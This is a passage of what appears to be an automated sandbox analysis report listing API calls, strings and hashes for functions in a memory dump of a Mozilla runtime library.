                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$Xlength_error@std@@
                                                                                                                                                        • String ID: map/set<T> too long
                                                                                                                                                        • API String ID: 1922495194-1285458680
                                                                                                                                                        • Opcode ID: 20e2ddd469ee1906f4d10eb2436fbd64b18f08c5cbb73f5b19d3ac340cb67b82
                                                                                                                                                        • Instruction ID: 344cb7a4897c8476cf4f201b6d497f6b911f8ecd26e2ed5e3bcb51320578da94
                                                                                                                                                        • Opcode Fuzzy Hash: 20e2ddd469ee1906f4d10eb2436fbd64b18f08c5cbb73f5b19d3ac340cb67b82
                                                                                                                                                        • Instruction Fuzzy Hash: BF615879A003459FD709CF19C884B9ABFE2BF4A314F98C599D8594B3A2C739EC41CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6B0E985D
                                                                                                                                                        • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6B0E987D
                                                                                                                                                        • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6B0E98DE
                                                                                                                                                        Strings
                                                                                                                                                        • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6B0E98D9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                                                                                        • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                                                                                        • API String ID: 1778083764-3290996778
                                                                                                                                                        • Opcode ID: 5228beeda66151997ee4a5a21bf70eaf824d52835bca63bad8672408d3c3bb91
                                                                                                                                                        • Instruction ID: e7271f54f02157a4dafd69f966d7b805a2f210bb2f6592c121a31eff0961381c
                                                                                                                                                        • Opcode Fuzzy Hash: 5228beeda66151997ee4a5a21bf70eaf824d52835bca63bad8672408d3c3bb91
                                                                                                                                                        • Instruction Fuzzy Hash: 82310871B001086FDB189FA9DC45BAE7FA9DF84754F50442DEE0A9B381DB399901CBE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(shell32,?,6B0ED020), ref: 6B07F122
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6B07F132
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: SHGetKnownFolderPath$shell32
                                                                                                                                                        • API String ID: 2574300362-1045111711
                                                                                                                                                        • Opcode ID: 0c04f61d301a127900fe1ede7d1631b8c85c7b6efd57623f4b474c07a1b23593
                                                                                                                                                        • Instruction ID: 86e92fd5b245ccf40414e76024c2383ddaaf7e33056452d4b3f6dda0a1e1a932
                                                                                                                                                        • Opcode Fuzzy Hash: 0c04f61d301a127900fe1ede7d1631b8c85c7b6efd57623f4b474c07a1b23593
                                                                                                                                                        • Instruction Fuzzy Hash: 19011E71715219ABDB14AF69EC58B5BBFECFF4A754B404428ED49D7200DB34E904CBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CurrentTerminate
                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                        • API String ID: 2429186680-2186867486
                                                                                                                                                        • Opcode ID: 1cfba9b265cb75fc2b18da9a0ea9bb23be61a836fc6b86f7ac0224ddce935b1c
                                                                                                                                                        • Instruction ID: c05e09a2bfd21403a57e8099f9f0bf26dc08e83155535579e8589b60219e7f40
                                                                                                                                                        • Opcode Fuzzy Hash: 1cfba9b265cb75fc2b18da9a0ea9bb23be61a836fc6b86f7ac0224ddce935b1c
                                                                                                                                                        • Instruction Fuzzy Hash: 95B01270604308DBDB106FB8FC0DB093F6DB709B01F000828FB0282241CBB9E1008F61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6B08237F
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6B082B9C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                        • Opcode ID: 83d74ed608423a43cf4258a56fa78eac7d96a5578eafa848f2500ccff4cccebe
                                                                                                                                                        • Instruction ID: eb111027687bd90ae56e4c7293bfbf4ad83206aab03196b5dc5203b9f20f849f
                                                                                                                                                        • Opcode Fuzzy Hash: 83d74ed608423a43cf4258a56fa78eac7d96a5578eafa848f2500ccff4cccebe
                                                                                                                                                        • Instruction Fuzzy Hash: F2E16B71A002059FDB18CF68C990B9EBFB2BF88314F1981A9E9099B345D775ED85CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6B0C8242,?,00000000,?,6B0BB63F), ref: 6B0C9188
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6B0C8242,?,00000000,?,6B0BB63F), ref: 6B0C91BB
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6B0C8242,?,00000000,?,6B0BB63F), ref: 6B0C91EB
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6B0C8242,?,00000000,?,6B0BB63F), ref: 6B0C9200
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6B0C8242,?,00000000,?,6B0BB63F), ref: 6B0C9219
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc$freememcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4259248891-0
                                                                                                                                                        • Opcode ID: bdc119f3a0380cbd1bf832e751639e57c741ec68b0586ee922bf49bedd3e8dc4
                                                                                                                                                        • Instruction ID: 9faed8058ef7663004be080599a135352380917e2368241c4ec9bbbd2158b33a
                                                                                                                                                        • Opcode Fuzzy Hash: bdc119f3a0380cbd1bf832e751639e57c741ec68b0586ee922bf49bedd3e8dc4
                                                                                                                                                        • Instruction Fuzzy Hash: 99312131A006058FEB15CF68DC4576F7BEAFF81308F414669D896D7251EB39E805CBA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0B0838
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000158), ref: 6B0B084C
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6B0B08AF
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6B0B08BD
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0B08D5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 837921583-0
                                                                                                                                                        • Opcode ID: 5d3ec408159f6385d40e2354e794bc40e7ff0cd45951783385cec0af3eef92cf
                                                                                                                                                        • Instruction ID: 0efbd7991533549b9d2d9c1811e29b9d09bfa4ccfab491fb41ead2532ac06277
                                                                                                                                                        • Opcode Fuzzy Hash: 5d3ec408159f6385d40e2354e794bc40e7ff0cd45951783385cec0af3eef92cf
                                                                                                                                                        • Instruction Fuzzy Hash: 1921B031B0420D9BEF088F64E845BAE7FB9AF85704F504578D90AA7240EB3AE9058F90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6B0817B2
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,?,?), ref: 6B0818EE
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B081911
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B08194C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3725304770-0
                                                                                                                                                        • Opcode ID: 9a93e4698238d4d22b7ca15386846ff78c8906caf10ca07d61e188355b48b278
                                                                                                                                                        • Instruction ID: 2742f48eef4685811ea61db35efd692b2cf2108f38a5ac0609872179e61f0ad1
                                                                                                                                                        • Opcode Fuzzy Hash: 9a93e4698238d4d22b7ca15386846ff78c8906caf10ca07d61e188355b48b278
                                                                                                                                                        • Instruction Fuzzy Hash: 10819170A10225DFCB08CF68D8956AEBFB6FF8D310F04456CE861A7354DB34A944CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6B0D7250
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B0D7277
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6B0D72C4
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FF688), ref: 6B0D72F7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 557828605-0
                                                                                                                                                        • Opcode ID: 7297b65aab39067e1f6f802a7d5810c52ac7f0fab9136f1e65e7b9a0bd6678a9
                                                                                                                                                        • Instruction ID: e417a951f4bb41488bebdf23cdaaa02b6f4e6e044542e0d6b35af293edc9191f
                                                                                                                                                        • Opcode Fuzzy Hash: 7297b65aab39067e1f6f802a7d5810c52ac7f0fab9136f1e65e7b9a0bd6678a9
                                                                                                                                                        • Instruction Fuzzy Hash: 63512E71E012198FCF08CFA8D891ABEBFBABB89304F158619DC15A7750DB35A945CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BE3E4
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE3F1
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6B0BE4AB
                                                                                                                                                          • Part of subcall function 6B085D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6B0BD2DA,00000001), ref: 6B085D66
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE4F5
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BE577
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE584
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE5DE
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000000), ref: 6B0BE6DA
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6B0BE864
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BE883
                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6B0BE8A6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
                                                                                                                                                        • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                        • API String ID: 905598890-53385798
                                                                                                                                                        • Opcode ID: 3ecc6e2f7910b12813c59cdbf4fb14bffc71628d707f6b3af367d606af3c0880
                                                                                                                                                        • Instruction ID: c83ed8f506cc807f07f24fcebe41b8e523c676edadc073635434af5329852b09
                                                                                                                                                        • Opcode Fuzzy Hash: 3ecc6e2f7910b12813c59cdbf4fb14bffc71628d707f6b3af367d606af3c0880
                                                                                                                                                        • Instruction Fuzzy Hash: 69416674A0060ADFCB18CF28D490BAABFB5FF4A304F0045ADD95A9B781D779E851CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6B0CDB86
                                                                                                                                                        • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6B0CDC0E
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0CDC2E
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0CDC40
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Impl@detail@mozilla@@Mutexfree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3186548839-0
                                                                                                                                                        • Opcode ID: a31319a05854ecf8a5075ef733d16944a776d0f1130fbb10dd69d95fd27235ae
                                                                                                                                                        • Instruction ID: 5a2f7b3a574b703440b7ed5b683be4978a20f2ae68d097a7449e05c9b6f5139c
                                                                                                                                                        • Opcode Fuzzy Hash: a31319a05854ecf8a5075ef733d16944a776d0f1130fbb10dd69d95fd27235ae
                                                                                                                                                        • Instruction Fuzzy Hash: FF4163796007009FC718DF38C498B5FBBE6BF88254F44896DE89A87351EB39E840CB52
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0CA315
                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6B0CA31F
                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,?), ref: 6B0CA36A
                                                                                                                                                          • Part of subcall function 6B095E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6B095EDB
                                                                                                                                                          • Part of subcall function 6B095E90: memset.VCRUNTIME140(ewk,000000E5,?), ref: 6B095F27
                                                                                                                                                          • Part of subcall function 6B095E90: LeaveCriticalSection.KERNEL32(?), ref: 6B095FB2
                                                                                                                                                          • Part of subcall function 6B0C2140: free.MOZGLUE(?,00000060,?,6B0C7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0C215D
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6B0CA37C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 700533648-0
                                                                                                                                                        • Opcode ID: babf1411ae41f345a4a65f9e784bf2c3237b085b90530807aff16df5d87f52d6
                                                                                                                                                        • Instruction ID: 9b4707a3b774c3cf07b18649c0ef3f02f73084c9e0a5169daf1228dc1a62541d
                                                                                                                                                        • Opcode Fuzzy Hash: babf1411ae41f345a4a65f9e784bf2c3237b085b90530807aff16df5d87f52d6
                                                                                                                                                        • Instruction Fuzzy Hash: B321C275A002249FCB199F1AD850B9FBFA9FF86754F544055EE095B300DB3AED02C6D2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0C1B98
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,6B0C1D96,00000000), ref: 6B0C1BA1
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,6B0C1D96,00000000), ref: 6B0C1BB5
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B0C1C25
                                                                                                                                                          • Part of subcall function 6B0C1C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6B0C759E,?,?), ref: 6B0C1CB4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3699359333-0
                                                                                                                                                        • Opcode ID: a173e27d8fdc283e9157ce82841291c89b19cbd7a23b31e9dc5a3345a033ac46
                                                                                                                                                        • Instruction ID: 0d813294a754f25611680f7e724f9e42cbe90d1f80a7ae14f2ebd11ebe495d0f
                                                                                                                                                        • Opcode Fuzzy Hash: a173e27d8fdc283e9157ce82841291c89b19cbd7a23b31e9dc5a3345a033ac46
                                                                                                                                                        • Instruction Fuzzy Hash: 5321D070A002289BDB089F26C8C57AFBFF9AF46B84F40445DE9165B242D77DE801CBD2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3732870572-0
                                                                                                                                                        • Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
                                                                                                                                                        • Instruction ID: da1e84c9d1531dbe1376615bd06d55ce7cd8bbe694992bef83f248010f878b37
                                                                                                                                                        • Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
                                                                                                                                                        • Instruction Fuzzy Hash: 1F214F71B006095FD724CFBDCC82E677BE8EB85714B118A3DE11AD7251E674A8008BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B08BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6B0D7A3F), ref: 6B08BF11
